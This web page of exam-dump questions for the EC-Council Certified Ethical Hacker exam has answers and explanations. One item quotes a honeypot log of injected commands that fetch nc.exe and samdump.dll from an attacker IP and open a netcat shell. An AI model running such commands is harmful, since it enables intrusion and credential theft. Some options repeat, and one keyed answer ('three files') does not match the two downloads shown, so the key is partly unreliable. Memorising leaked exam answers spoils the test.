EC-Council EC0-350 Exam Questions
Ethical Hacking and Countermeasures (Page 5 )

Updated On: 16-Feb-2026

Sara is making use of Digest Authentication for her Web site. Why is this considered to be more secure than Basic authentication?

  1. Basic authentication is broken
  2. The password is never sent in clear text over the network
  3. The password sent in clear text over the network is never reused.
  4. It is based on Kerberos authentication protocol

Answer(s): B

Explanation:

Digest access authentication is one of the agreed methods a web page can use to negotiate credentials with a web user (using the HTTP protocol). This method builds upon (and obsoletes) the basic authentication scheme, allowing user identity to be established without having to send a password in plaintext over the network.



Your boss at ABC.com asks you what are the three stages of Reverse Social Engineering.

  1. Sabotage, advertising, Assisting
  2. Sabotage, Advertising, Covering
  3. Sabotage, Assisting, Billing
  4. Sabotage, Advertising, Covering

Answer(s): A

Explanation:

Typical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.



Which of the following is the best way an attacker can passively learn about technologies used in an organization?

  1. By sending web bugs to key personnel
  2. By webcrawling the organization web site
  3. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization
  4. By performing a port scan on the organization's web site

Answer(s): C

Explanation:

Note: Sending web bugs, webcrawling their site and port scanning are considered "active" attacks, the question asks "passive"



The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below:
“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get nc.exe >>ftpcom”
“cmd1.exe /c echo get samdump.dll >>ftpcom”
“cmd1.exe /c echo quit >>ftpcom”
“cmd1.exe /c ftp –s:ftpcom”
“cmd1.exe /c nc –l –p 6969 e-cmd1.exe”
What can you infer from the exploit given?

  1. It is a local exploit where the attacker logs in using username johna2k.
  2. There are two attackers on the system – johna2k and haxedj00.
  3. The attack is a remote exploit and the hacker downloads three files.
  4. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.

Answer(s): C



Which of the following statements best describes the term Vulnerability?

  1. A weakness or error that can lead to a compromise
  2. An agent that has the potential to take advantage of a weakness
  3. An action or event that might prejudice security
  4. The loss potential of a threat.

Answer(s): A

Explanation:

Vulnerabilities are all weaknesses that can be exploited.






Post your Comments and Discuss EC-Council EC0-350 exam dumps with other Community members:

Join the EC0-350 Discussion